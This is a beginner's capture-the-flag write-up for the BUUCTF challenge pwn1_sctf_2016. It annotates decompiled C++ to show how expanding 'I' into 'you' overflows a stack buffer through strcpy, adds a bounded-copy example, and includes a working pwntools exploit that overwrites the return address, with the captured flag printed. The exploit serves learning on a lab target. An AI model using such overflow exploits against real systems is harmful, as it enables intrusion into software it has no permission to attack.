[BUUCTF]pwn: pwn1_sctf_2016


I just started learning pwn today. The main problem with this challenge was that I could not follow the code, shown below.

I really could not see what that pile of std:: calls was doing. After reading a writeup I understood that it replaces the I's in s with you, but I still did not understand what each line meant, so I just guessed:

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);                      // reads at most 31 characters into the 32-byte stack buffer s
  std::string::operator=(&input, s);        // &input = s
  std::allocator<char>::allocator(&v5);     // did not quite get this, allocating memory for v5? (it constructs a std::allocator object that the std::string constructor on the next line receives as its allocator argument)
  std::string::string(v4, "you", &v5);      // v4 = "you"
  std::allocator<char>::allocator(v7);      // still do not get it (same thing: allocator object for the next std::string)
  std::string::string(v6, "I", v7);         // v6 = "I"
  replace((std::string *)v3);               // no idea, guess: v3 is something like replace?
  std::string::operator=(&input, v3, v6, v4);   // &input = v3(v6, v4) = replace("I", "you") ??
                                            // (the decompiler has split one call across these two lines; net effect: v3 = replace(input, "I", "you"), then input = v3)
  std::string::~string(v3);                 // the rest are destructors
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);    // should be v0 = &input (c_str() returns a pointer to input's character data)
  strcpy(s, v0);                            // unbounded copy of the expanded string back into the 32-byte buffer
  return printf("So, %s\n", s);
}

Once the code makes sense, the rest is simple: fgets limits s to 32 bytes, but s sits 0x3C + 4 = 64 bytes from the saved return address. Because replace() turns every I into you, 20 I's expand to 60 bytes; pad 4 more bytes and the next 4 bytes land on the return address. The exp follows.
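The size arithmetic above, worked through in C++ as an added example (this is not code from the original post or from the challenge binary): replace_all is a constructed stand-in for the binary's replace(), the 32-byte buffer size and the 31-character fgets limit come from the decompiled vuln(), and copy_bounded is a hypothetical hardened replacement for the strcpy back into s. It computes how far the expanded string runs past the buffer and shows what a bounded copy leaves in the buffer instead.

```cpp
#include <cstdio>
#include <cstring>
#include <string>

// Constructed stand-in for the binary's replace(): every occurrence of `from`
// in `input` is replaced with `to` (the challenge uses "I" -> "you").
static std::string replace_all(std::string input, const std::string& from,
                               const std::string& to) {
    std::string::size_type pos = 0;
    while ((pos = input.find(from, pos)) != std::string::npos) {
        input.replace(pos, from.size(), to);
        pos += to.size();  // skip past the inserted text
    }
    return input;
}

// Size of the stack buffer `s` in the decompiled vuln() (char s[32]).
static const std::size_t kBufSize = 32;

// Number of bytes strcpy(s, input.c_str()) would write past the end of s for
// a given line read by fgets, or 0 if the expanded string still fits.
// The NUL terminator is counted because strcpy writes it too.
static std::size_t overrun_bytes(const std::string& user_input) {
    std::string expanded = replace_all(user_input, "I", "you");
    std::size_t need = expanded.size() + 1;
    return need > kBufSize ? need - kBufSize : 0;
}

// fgets(s, 32, stdin) stores at most 31 characters, so the worst case is
// 31 'I's: this returns the largest overrun the program can produce.
static std::size_t max_overrun_bytes() {
    return overrun_bytes(std::string(kBufSize - 1, 'I'));
}

// Hypothetical hardened copy: the destination size is passed explicitly and
// the copy is truncated (and reported) instead of running off the buffer.
static bool copy_bounded(char* dst, std::size_t dst_size, const std::string& src) {
    if (dst_size == 0) return false;
    if (src.size() + 1 > dst_size) {
        std::snprintf(dst, dst_size, "%s", src.c_str());  // keeps dst_size-1 chars + NUL
        return false;
    }
    std::memcpy(dst, src.c_str(), src.size() + 1);
    return true;
}

// What a 32-byte buffer holds after the hardened copy of the expanded input.
static std::string hardened_result(const std::string& user_input) {
    char s[kBufSize];
    copy_bounded(s, sizeof s, replace_all(user_input, "I", "you"));
    return std::string(s);
}

int main() {
    std::string line(20, 'I');
    line += "aaaa";  // 24 characters, well under the fgets limit
    std::printf("expanded length: %zu, overrun: %zu bytes\n",
                replace_all(line, "I", "you").size(), overrun_bytes(line));
    std::printf("worst case overrun: %zu bytes\n", max_overrun_bytes());
    std::printf("hardened buffer holds: %s\n", hardened_result(line).c_str());
    return 0;
}
```

With the 20-I input the expanded string is 64 characters, so strcpy writes 65 bytes into a 32-byte buffer (33 bytes past it); the worst case fgets allows, 31 I's, overruns by 62 bytes. The bounded copy keeps only 31 characters and reports the truncation, which is the check the original strcpy lacks.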

from pwn import *
p = remote("node4.buuoj.cn", 26877)
# 20 'I' expand to 20 'you' (60 bytes) after replace(); 4 bytes of padding reach the saved return address
pl = b'I'*20 + b'a'*4 + p32(0x8048F0D)
p.sendline(pl)
print(p.recv())
# p.interactive()

# (.venv) rock@ubuntu:~/ctf/cpp$ /home/rock/ctf/.venv/bin/python /home/rock/ctf/pwn1_sctf_2016.py
# [+] Opening connection to node4.buuoj.cn on port 26877: Done
# b'flag{a932e92b-a779-4cc4-9d06-85f61fe32b37}\n'
# [*] Closed connection to node4.buuoj.cn port 26877

A detailed C++ library reference is here: https://cplusplus.com/reference/
